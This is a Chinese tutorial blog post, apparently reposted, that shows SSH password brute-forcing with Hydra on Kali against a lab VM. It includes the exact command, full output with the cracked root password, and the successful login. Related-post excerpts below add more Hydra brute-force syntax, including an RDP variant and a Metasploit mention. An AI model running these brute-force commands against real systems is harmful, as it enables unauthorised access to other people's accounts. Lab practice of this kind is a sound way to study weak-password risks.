Kali系列之hydra ssh密码爆破

最新推荐文章于 2025-04-09 21:18:43 发布
最新推荐文章于 2025-04-09 21:18:43 发布
阅读量1.7k 收藏 1
点赞数 1
文章标签: 运维
原文链接:http://www.cnblogs.com/chenglee/p/8805871.html
版权

环境

kali 192.168.137.131

靶机 192.168.137.133

语句

hydra -l root -P /home/chenglee/zidian/wordlist.TXT -t 6 ssh://192.168.137.133

状态

root@kali:/home/chenglee# hydra -l root -P /home/chenglee/zidian/wordlist.TXT -t 6 ssh://192.168.137.133
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-04-12 10:21:01
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 6 tasks per 1 server, overall 6 tasks, 213561 login tries (l:1/p:0), ~213561 tries per task
[DATA] attacking ssh://192.168.137.133:22/
[STATUS] 96.00 tries/min, 96 tries in 00:00h, 0 to do in 01:00h, 213465 active
[22][ssh] host: 192.168.137.133   login: root   password: lizhenghua
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-04-12 10:23:47
root@kali:/home/chenglee# ss
ss           ssh2john     ssh-argv0    ssh-keygen   sshow        ssldump      sslscan      sslstrip     
sselp        ssh-add      ssh-copy-id  ssh-keyscan  ssid         sslh         sslsniff     sslyze       
ssh          ssh-agent    sshd         sshmitm      sslcaudit    sslh-select  sslsplit     ss_spike     
root@kali:/home/chenglee# ssh root@192.168.137.133
root@192.168.137.133's password: 
Last login: Thu Apr 12 17:15:19 2018 from 192.168.137.1
[root@localhost ~]# ipaddr
-bash: ipaddr: command not found
[root@localhost ~]# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
    link/ether 00:0c:29:85:c0:fa brd ff:ff:ff:ff:ff:ff
    inet 192.168.137.133/24 brd 192.168.137.255 scope global eth0
    inet6 fe80::20c:29ff:fe85:c0fa/64 scope link 
       valid_lft forever preferred_lft forever

 

转载于:https://www.cnblogs.com/chenglee/p/8805871.html

Kali下的SSH爆破工具
7Riven's blog
11-24 6805
1.hydra(九头蛇)工具 使用已知用户,进行密码爆破 hydra -l zhangsan -P /root/passwd.txt ssh://192.168.10.1 使用已知密码,进行用户爆破 hydra -L /root/user.txt -p 123.com ssh://192.168.10.1 使用用户字典、密码字典,对多个目标主机进行爆破 hydra -L /root/user...
kali使用hydra工具进行ssh、ftp等密码爆破
热门推荐
l578900的博客
09-02 1万+
1、实验环境: Centos和kali均处于nat模式,centos联网,centos的ip:192.168.136.142 并且kali可以ping通centos 2、准备开始破解密码,给centos设立一个弱密码,并且kali具有字典wordlist.TXT 3、确定centos支持远程登录ssh(查看端口号,ssh的端口号是22),并且开始对文件进行追踪 输入命令:netstat -antpl (t表示:tcp , p表示:进程号pid , l表示:监听) 输入
kali linux-msf-ssh爆破
10-13
使用 nmap(-A -T4参数) metasploit (直接search 查找,然后 use利用就好了)本模块将测试SSH登录,在一系列的机器和报告成功登录。如果你有一个数据库加载插件和连接到一个数据库,该模块会记录成功登录和HOSTS使您可以跟踪您的访问。
kali爆破ssh
qq_73277309的博客
08-06 1218
netstat -tunlp 含义。5、查看端口状态,确定ssh是否开启。6、查看目标机的ssh是否开启。3、写账号字典和密码字典。
kali linux网络安全弱口令爆破常用命令(二)
最新发布
A1_3_9_7的博客
04-09 674
Kali Linux中的Hydra是一款强大的网络登录破解工具,它支持多种协议,如FTP、SSH、Telnet等。弱口令爆破是一种常见的网络攻击手段,通过尝试不同的用户名和密码组合来获取系统的访问权限。Hydra是一款强大的暴力破解工具,可以用于执行弱口令爆破。**1. 主机(Host):**要尝试破解的目标主机的IP地址或域名。**2. 端口(Port):**目标主机上服务运行的端口号。**3. 协议(Protocol):**目标主机上服务使用的协议,如SSH、FTP等。
kalihydra破解ssh密码
sc_Pease的博客
01-05 1116
一、参数说明 hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT] -R 继续从上一次进度接着破解。 -S 采用SSL链接。 -s PORT 可通过这个参数指定非默认端口。 -l LOGIN 指定破解的用户,对特定用.
kali——hydra的使用
bunengyongzho666的博客
09-03 1219
kali自带的hydra暴力破解工具(九头蛇)能够在多种协议上执行暴力破解,支持的服务包括但不限于FTP、Telnet、Rlogin、SSH、HTTP、HTTPS、SOLO、IMAP、POP3、VNC和SQLhydra工具没有自带字典,需要自己指定字典,可以在网上下载合适的字典。hydra暴力破解能否成功取决于使用的字典是否强大以及服务端防火墙策略。hydra -L user.txt -P password.txt 目标地址 服务注意用户名和密码字典的路径应该是绝对路径或者直接在字典所在目录下执行命令。
Kali】中密码暴力破解工具hydra的使用
xueshenlaila的博客
03-10 1万+
前言 hydra是著名黑客组织thc的一款开源的暴力破解密码工具,功能非常强大,kali下是默认安装的,几乎支持所有协议的在线破解。密码能否破解,在于字典是否强大。本文仅从安全角度去讲解工具的使用,请勿用于非法用途。 hydra参数讲解 -R #继续从上一次进度接着破解。 -S #采用SSL链接。 -s #PORT 可通过这个参数指定非默认端口。 -l #LOGIN 指定破解的用户,对特定用户破解。 -L #FILE 指定用户名字典。 -p #PASS 小写,指定密码破解,少用,一般是采用密
kalissh超级爆破,字典自动生成。
Afghanis的博客
05-12 7410
利用kali渗透工具对服务器,个人电脑等进行ssh爆破ssh默认端口一般是22端口。
ssh暴力破解
有小小的远大抱负
04-25 1725
这里因为演示环境,直接输入几个简单的密码字符到test里面。最终可以看到暴力破解密码成功,密码是123456。下一步使用medusa进行暴力破解。
Kalissh爆破以及nikto工具漏洞扫描-漏洞银行大咖周3 -屌丝绅士
01-26
来源:漏洞银行大咖面对面一周大咖秀3 作者:屌丝绅士
kali linux SSH服务的版本识别与爆破
wkend的博客
03-21 7972
SSH原理 最早的时候,互联网通信都是明文通信,内容都是明文通信,当然在如今,任然存在明文通信,这种情况在学校的网络中比较常见。1995年,芬兰学者Tatu Ylonen设计了SSH协议,将登录信息全部加密,成为互联网安全的一个基本解决方案,迅速在全世界获得推广,目前已经成为Linux系统的标准配置。ssh只是一种网络协议,有不同的安全需求,所以就有不同的实现,既有商业,也有开源,在这里,我要...
kaliHydra用法及对ssh,数据库密码爆破
weixin_46263525的博客
07-25 7090
kaliHydra的用法及对ssh,数据库密码爆破
SSH端口爆破及其应急响应方案
m0_58540923的博客
07-26 2465
Secure Shell (安全外壳协议,简称SSH) 是一种加密的网络传输协议;用途:安全远程登录;可帮助我们在windows下去连接并操作linux服务器。常见的SSH客户端有putty、SSH Secure Shell、MobaXterm 、Xshell等;常用端口:22爆破时间、爆破用户、攻击者ip、攻击方式。
SSH弱口令爆破服务器
fencecat的博客
08-27 1874
本文使用kalihydra进行ssh弱口令爆破,获得服务器的用户名和口令,通过 ssh远程登录服务器,并对服务器的登录日志进行了分析,统计了是哪些用户对服务器进行了暴力破解以及暴力破解失败的次数。
网络安全: Kali Linux 进行 SSH 渗透与防御
cronaldo91的博客
03-06 2603
(3) 查看Kali Linux (2022.4)系统IP地址。(2)查看Kali Linux (2022.4)系统版本。(2)扫描⽬标主机所有开放端⼝对应的服务和软件版本。(1)扫描⽬标主机所在⽹段所有存活的主机。192.168.204.154(动态)(17)SSH安全配置(容错次数)( 14)SSH安全配置(端口)(1)SSH安全配置(端口)(5)进入MSF 控制台。(8)设置用户名与密码本。(16)验证(等待1分钟)(1)进入MSF 控制台。(5)设置用户名与密码本。(10)nmap扫描端口。
kali linux网络安全弱口令爆破常用命令!!!
2201_75362610的博客
02-29 1684
Kali Linux中的Hydra是一款强大的网络登录破解工具,它支持多种协议,如FTP、SSH、Telnet等。弱口令爆破是一种常见的网络攻击手段,通过尝试不同的用户名和密码组合来获取系统的访问权限。Hydra是一款强大的暴力破解工具,可以用于执行弱口令爆破。**1. 主机(Host):**要尝试破解的目标主机的IP地址或域名。**2. 端口(Port):**目标主机上服务运行的端口号。**3. 协议(Protocol):**目标主机上服务使用的协议,如SSH、FTP等。
使用kali+hydra爆破win7用户密码kali 攻击win7
09-14
使用Kali Linux中的Hydra工具进行密码爆破攻击是一项安全测试活动,用于检查系统的安全性。请注意,这样的行为应该仅限于授权的测试环境或在你拥有明确授权的情况下进行,未经授权对任何系统进行攻击是违法的。 下面是一个基本的指导,介绍如何使用Hydra工具来尝试破解Windows 7操作系统的用户名和密码: 1. 准备工作:首先,确保你已经安装了Kali Linux,并且已经安装了Hydra工具。如果没有安装,可以通过Kali的包管理器apt进行安装。 2. 收集信息:了解目标系统的IP地址、使用的协议(如SSH, FTP, HTTP等)以及可能的用户名和密码信息。 3. 运行Hydra:使用以下格式的命令来尝试爆破密码: ```bash hydra -l username -P passwords.txt -s port_number ip_address protocol ``` - `-l username`:指定要尝试的用户名。 - `-P passwords.txt`:指定包含可能密码的文件。 - `-s port_number`:指定服务运行的端口号(如远程桌面默认是3389)。 - `ip_address`:目标系统的IP地址。 - `protocol`:指定服务的协议,例如:`rdp`(远程桌面协议)、`ssh`、`ftp`等。 例如,如果你尝试爆破远程桌面的密码,命令可能如下: ```bash hydra -l administrator -P passwords.txt -s 3389 192.168.1.1 rdp ``` 这里 `-l administrator` 表示尝试破解的用户名是 `administrator`,`-P passwords.txt` 是一个包含密码的文本文件,`-s 3389` 指定远程桌面服务的端口,`192.168.1.1` 是目标系统的IP地址。 4. 分析输出:Hydra执行完毕后会显示结果,如果成功,它会告诉你找到的密码是什么。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值